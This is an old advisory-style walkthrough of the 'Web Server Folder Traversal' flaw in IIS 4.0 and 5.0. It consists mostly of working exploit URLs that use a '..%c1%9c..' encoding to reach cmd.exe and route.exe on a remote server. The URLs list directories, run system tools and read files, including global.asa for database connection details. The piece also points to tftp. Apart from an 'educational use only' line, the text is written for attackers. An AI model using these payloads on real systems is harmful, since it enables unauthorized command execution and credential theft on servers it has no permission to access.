Products Affected: Internet Information
Services (IIS) 4.0 & 5.0
OS: Windows NT Windows 2000
Description:
Run commands remotely on IIS
This article describe the "Web Server Folder Traversal"
security vulnerability in Internet Information Server (IIS).
Advisory:
By simply passing a url to a machine that is exploitable you can run
any command directly on the remote machine. Remember this is for EDUCATIONAL
USE ONLY and should only be run on your own machine.
For example:
First you can list all the files in a directory by using this: (Change
localhost with the domainname of the server)
http://localhost/scripts/..%c1%9c../winnt/system32/cmd.exe?/C+dir+C:
you can view any file on the system by changing the "C:" to any directory
for example c:\inetpub
Now for more advanced users you can run commands by using:
http://localhost/scripts/..%c1%9c../winnt/system32/route.exe?PRINT
This example will print a copy of the routing table directly to your
browser. You can run any exe that will give output from this line
such as netstat, ipconfig, tftp, etc.
Now lets say you find something interesting on the machines harddrive
- for example if someone is a crappy ASP programmer they will use
the global.asa to hold all the database connection info. Now if your
curious enough and your familiar with IIS you know where to find this
at - i'm not going to hold your hand.
To view files of interest you would simply use this url:
http://localhost/scripts/..%c1%9c../winnt/system32/cmd.exe?/C+type+C:\inetpub\wwwroot\directory\global.asa
This will 'type' the files contents to your browser - in other words
you can view all the source code instead of executing it on the server.
|
|